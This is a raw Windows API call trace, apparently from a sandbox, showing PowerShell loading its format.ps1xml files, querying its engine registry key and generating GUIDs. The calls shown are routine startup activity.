	[0758.058] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0758.059] GetFileType (hFile=0x198) returned 0x1
	[0758.059] SetErrorMode (uMode=0x1) returned 0x1
	[0758.059] GetFileType (hFile=0x198) returned 0x1
	[0758.059] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.059] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.059] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.060] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.060] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.060] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.060] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.060] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.061] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.062] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.062] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.062] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.062] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.062] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.063] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.063] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.063] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.064] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.064] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.064] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.065] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.065] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0xe67, lpOverlapped=0x0) returned 1
	[0758.065] ReadFile (in: hFile=0x198, lpBuffer=0x2eef1df, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eef1df*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0758.065] ReadFile (in: hFile=0x198, lpBuffer=0x2eefc10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x2eefc10*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0758.066] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0758.066] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0758.066] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0758.066] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0758.066] CoTaskMemFree (pv=0x286c4e0) 
	[0758.066] RegCloseKey (hKey=0x198) returned 0x0
	[0758.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0758.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0758.068] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xac5ffd74, Data2=0xeb0f, Data3=0x47f1, Data4=([0]=0xa0, [1]=0xdc, [2]=0x8f, [3]=0x39, [4]=0xa1, [5]=0x7c, [6]=0x88, [7]=0x44))) returned 0x0
	[0758.068] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x92053a81, Data2=0xbe95, Data3=0x4678, Data4=([0]=0x91, [1]=0x69, [2]=0x99, [3]=0xfa, [4]=0x9, [5]=0x2e, [6]=0x4, [7]=0x26))) returned 0x0
	[0758.068] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc23f4333, Data2=0x9f15, Data3=0x4b16, Data4=([0]=0x9a, [1]=0xeb, [2]=0x6b, [3]=0x5e, [4]=0x29, [5]=0xeb, [6]=0x12, [7]=0xaa))) returned 0x0
	[0758.068] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9eddf3c7, Data2=0x29ec, Data3=0x4adc, Data4=([0]=0xad, [1]=0x91, [2]=0xdf, [3]=0x4e, [4]=0x67, [5]=0x7a, [6]=0x90, [7]=0xb3))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xfda55687, Data2=0x95be, Data3=0x4d1f, Data4=([0]=0x8a, [1]=0x8b, [2]=0x79, [3]=0x14, [4]=0x31, [5]=0x10, [6]=0xb1, [7]=0x40))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x573d4169, Data2=0x1987, Data3=0x46a9, Data4=([0]=0xab, [1]=0x5f, [2]=0x2a, [3]=0x71, [4]=0x12, [5]=0xb0, [6]=0x52, [7]=0x59))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x394aa247, Data2=0xb771, Data3=0x4438, Data4=([0]=0x8c, [1]=0x3a, [2]=0x26, [3]=0x55, [4]=0x8f, [5]=0x79, [6]=0xcb, [7]=0xee))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe7c938b, Data2=0xbbe, Data3=0x43ab, Data4=([0]=0xbd, [1]=0x87, [2]=0x2e, [3]=0xec, [4]=0xb5, [5]=0x1e, [6]=0x90, [7]=0x75))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x7c92e6ee, Data2=0x26ed, Data3=0x4cd4, Data4=([0]=0x8f, [1]=0x86, [2]=0xfc, [3]=0xbf, [4]=0x22, [5]=0xd, [6]=0xe5, [7]=0x95))) returned 0x0
	[0758.069] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xea817438, Data2=0x8370, Data3=0x4bce, Data4=([0]=0xb8, [1]=0x2b, [2]=0x6b, [3]=0x7, [4]=0x2e, [5]=0xd1, [6]=0x10, [7]=0xc2))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe36624e, Data2=0x1fe4, Data3=0x4c24, Data4=([0]=0x94, [1]=0xf2, [2]=0x10, [3]=0xa2, [4]=0xd3, [5]=0xcd, [6]=0xfc, [7]=0x9d))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x88610e79, Data2=0xd212, Data3=0x4aaf, Data4=([0]=0x91, [1]=0x55, [2]=0xa9, [3]=0xe8, [4]=0x5d, [5]=0x6c, [6]=0xaf, [7]=0xdb))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8389e090, Data2=0x85f5, Data3=0x45dd, Data4=([0]=0xb0, [1]=0xed, [2]=0x73, [3]=0xe7, [4]=0x9c, [5]=0xa, [6]=0x62, [7]=0xee))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xea9464f, Data2=0x6285, Data3=0x4528, Data4=([0]=0xa3, [1]=0xcd, [2]=0x33, [3]=0xe9, [4]=0x24, [5]=0x91, [6]=0xe2, [7]=0x67))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x10fe2b8b, Data2=0x37bf, Data3=0x4fbb, Data4=([0]=0x9c, [1]=0x55, [2]=0xa9, [3]=0x85, [4]=0x83, [5]=0xbd, [6]=0x46, [7]=0xcf))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x265397bc, Data2=0xb784, Data3=0x4b30, Data4=([0]=0xb8, [1]=0xcf, [2]=0x38, [3]=0xd3, [4]=0xda, [5]=0x31, [6]=0xf9, [7]=0x35))) returned 0x0
	[0758.070] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xdf22bad7, Data2=0x6498, Data3=0x4c09, Data4=([0]=0xbc, [1]=0x5c, [2]=0xc0, [3]=0x31, [4]=0xc0, [5]=0xa0, [6]=0x4, [7]=0x89))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x14c93d63, Data2=0x8fe5, Data3=0x448c, Data4=([0]=0x8b, [1]=0x6, [2]=0x6f, [3]=0x8d, [4]=0xd3, [5]=0x15, [6]=0x45, [7]=0xd7))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xac4346e3, Data2=0xb4ab, Data3=0x4ba9, Data4=([0]=0x91, [1]=0x46, [2]=0xce, [3]=0x53, [4]=0xa4, [5]=0x27, [6]=0xfa, [7]=0x20))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x5eab1d90, Data2=0x4e3d, Data3=0x4a4a, Data4=([0]=0x94, [1]=0x3c, [2]=0xc, [3]=0x8d, [4]=0x99, [5]=0xce, [6]=0xe8, [7]=0xb1))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc43fd9ac, Data2=0x2818, Data3=0x4de7, Data4=([0]=0x96, [1]=0xa6, [2]=0x3e, [3]=0xd1, [4]=0x21, [5]=0x74, [6]=0x10, [7]=0xb4))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x5a8cedb8, Data2=0xd36f, Data3=0x47d3, Data4=([0]=0xb0, [1]=0xda, [2]=0x14, [3]=0x3, [4]=0x28, [5]=0x95, [6]=0x27, [7]=0xf7))) returned 0x0
	[0758.071] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xdf001ee, Data2=0x6f70, Data3=0x4637, Data4=([0]=0x85, [1]=0xf1, [2]=0xa3, [3]=0x16, [4]=0x74, [5]=0xdf, [6]=0xf2, [7]=0x21))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x22de6b8e, Data2=0xcce, Data3=0x45a6, Data4=([0]=0xac, [1]=0x52, [2]=0x7a, [3]=0xd1, [4]=0x2, [5]=0xdb, [6]=0x96, [7]=0xae))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xac801e9, Data2=0xf37, Data3=0x4336, Data4=([0]=0x9d, [1]=0xea, [2]=0xc6, [3]=0xf6, [4]=0x4, [5]=0x68, [6]=0x58, [7]=0x3e))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x7c0c9be9, Data2=0x4e0b, Data3=0x4c9f, Data4=([0]=0xb6, [1]=0x8, [2]=0xc4, [3]=0x2a, [4]=0xd8, [5]=0x27, [6]=0x19, [7]=0x8a))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xf2cc6d2, Data2=0x364f, Data3=0x4337, Data4=([0]=0x93, [1]=0xd, [2]=0x6f, [3]=0xf4, [4]=0x93, [5]=0xe2, [6]=0x27, [7]=0x53))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x79a73ab1, Data2=0xf075, Data3=0x4bda, Data4=([0]=0xbb, [1]=0x8c, [2]=0xe0, [3]=0x84, [4]=0xfc, [5]=0x63, [6]=0xa0, [7]=0x5f))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xcf1075d7, Data2=0x1cf2, Data3=0x42f5, Data4=([0]=0x84, [1]=0xc8, [2]=0x58, [3]=0xa3, [4]=0xbf, [5]=0xc0, [6]=0x79, [7]=0x7))) returned 0x0
	[0758.072] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xae5dd04b, Data2=0x1128, Data3=0x4a4b, Data4=([0]=0x9f, [1]=0xd6, [2]=0x9f, [3]=0xe, [4]=0x49, [5]=0x9, [6]=0xec, [7]=0x4d))) returned 0x0
	[0758.073] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x268e7dad, Data2=0x6cc5, Data3=0x444b, Data4=([0]=0x8b, [1]=0xb2, [2]=0x4e, [3]=0xad, [4]=0x1f, [5]=0x7, [6]=0xc7, [7]=0xd2))) returned 0x0
	[0758.073] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xd287b7d2, Data2=0xf07c, Data3=0x492e, Data4=([0]=0x83, [1]=0xf7, [2]=0x67, [3]=0xb8, [4]=0x1b, [5]=0xc2, [6]=0xe6, [7]=0x3c))) returned 0x0
	[0758.073] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc91e54c7, Data2=0x678d, Data3=0x4fb1, Data4=([0]=0xb0, [1]=0xac, [2]=0xf5, [3]=0xaf, [4]=0xd7, [5]=0x4c, [6]=0x79, [7]=0xd9))) returned 0x0
	[0758.074] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xcdf671ab, Data2=0x221f, Data3=0x48f7, Data4=([0]=0xae, [1]=0x4c, [2]=0x9a, [3]=0x48, [4]=0xd9, [5]=0x54, [6]=0xc9, [7]=0x91))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x5fbd0ca8, Data2=0x3207, Data3=0x4679, Data4=([0]=0x88, [1]=0xca, [2]=0x72, [3]=0xfb, [4]=0xa0, [5]=0x9b, [6]=0x76, [7]=0x4a))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xd85fc9b8, Data2=0x506c, Data3=0x4364, Data4=([0]=0xb1, [1]=0x64, [2]=0xe0, [3]=0x5d, [4]=0xe9, [5]=0xf, [6]=0x6d, [7]=0xc4))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8633c76f, Data2=0xb6be, Data3=0x42f5, Data4=([0]=0xad, [1]=0xf6, [2]=0xb3, [3]=0xbe, [4]=0x62, [5]=0xbb, [6]=0xde, [7]=0x18))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2e6044f1, Data2=0xf529, Data3=0x4468, Data4=([0]=0xa5, [1]=0x5f, [2]=0xa4, [3]=0x8c, [4]=0xff, [5]=0xf2, [6]=0x31, [7]=0x98))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xf2d7d95f, Data2=0xf80, Data3=0x432b, Data4=([0]=0xbf, [1]=0x24, [2]=0x23, [3]=0x6b, [4]=0x13, [5]=0xc7, [6]=0x48, [7]=0x86))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x73952756, Data2=0xcc38, Data3=0x4bce, Data4=([0]=0xa2, [1]=0xc9, [2]=0x2f, [3]=0xc8, [4]=0x80, [5]=0x78, [6]=0xbd, [7]=0xc7))) returned 0x0
	[0758.075] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x567cedab, Data2=0x7292, Data3=0x49de, Data4=([0]=0x99, [1]=0x9d, [2]=0x1c, [3]=0x93, [4]=0x6a, [5]=0xbb, [6]=0xdb, [7]=0x21))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x4abe4c56, Data2=0x6856, Data3=0x4e88, Data4=([0]=0x93, [1]=0xcd, [2]=0xb0, [3]=0x93, [4]=0xa9, [5]=0xd7, [6]=0x58, [7]=0x3a))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xa121aa21, Data2=0xb383, Data3=0x4b37, Data4=([0]=0xa1, [1]=0xe0, [2]=0xb6, [3]=0x22, [4]=0xe, [5]=0xcc, [6]=0x3c, [7]=0x59))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x6a2ee3b7, Data2=0x1990, Data3=0x4a14, Data4=([0]=0xbd, [1]=0xe0, [2]=0xda, [3]=0x11, [4]=0xf6, [5]=0x25, [6]=0x1f, [7]=0xb6))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x942bc8a4, Data2=0xfcc6, Data3=0x49c8, Data4=([0]=0x82, [1]=0x6, [2]=0x1b, [3]=0xe5, [4]=0x11, [5]=0x76, [6]=0x91, [7]=0xa1))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x79cbb7a2, Data2=0x8b22, Data3=0x45fc, Data4=([0]=0x9b, [1]=0x58, [2]=0x87, [3]=0x34, [4]=0xa4, [5]=0xbe, [6]=0x9c, [7]=0x71))) returned 0x0
	[0758.076] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x49f7230b, Data2=0x3b97, Data3=0x4a0f, Data4=([0]=0x9c, [1]=0x99, [2]=0xf1, [3]=0x92, [4]=0xae, [5]=0x72, [6]=0xa1, [7]=0xc9))) returned 0x0
	[0758.077] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xeb137c53, Data2=0x7162, Data3=0x4d6c, Data4=([0]=0x91, [1]=0xb6, [2]=0x0, [3]=0xca, [4]=0xe, [5]=0x2e, [6]=0xe6, [7]=0x26))) returned 0x0
	[0758.077] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0758.077] GetFileType (hFile=0x198) returned 0x1
	[0758.077] SetErrorMode (uMode=0x1) returned 0x1
	[0758.077] GetFileType (hFile=0x198) returned 0x1
	[0758.077] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x8b4, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304d14c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304d14c*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0758.078] ReadFile (in: hFile=0x198, lpBuffer=0x304dd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x304dd30*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0758.079] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0758.079] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0758.079] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0758.079] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0758.079] CoTaskMemFree (pv=0x286c4e0) 
	[0758.079] RegCloseKey (hKey=0x198) returned 0x0
	[0758.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0758.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0758.080] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xee7ed406, Data2=0x1dfa, Data3=0x4461, Data4=([0]=0x95, [1]=0xa9, [2]=0x80, [3]=0xd7, [4]=0xd4, [5]=0x89, [6]=0x95, [7]=0xf4))) returned 0x0
	[0758.080] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe6ab8ec5, Data2=0xa430, Data3=0x49f2, Data4=([0]=0x99, [1]=0xdf, [2]=0x7a, [3]=0x8, [4]=0x4e, [5]=0x6b, [6]=0x7e, [7]=0xcb))) returned 0x0
	[0758.080] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0758.080] GetFileType (hFile=0x198) returned 0x1
	[0758.080] SetErrorMode (uMode=0x1) returned 0x1
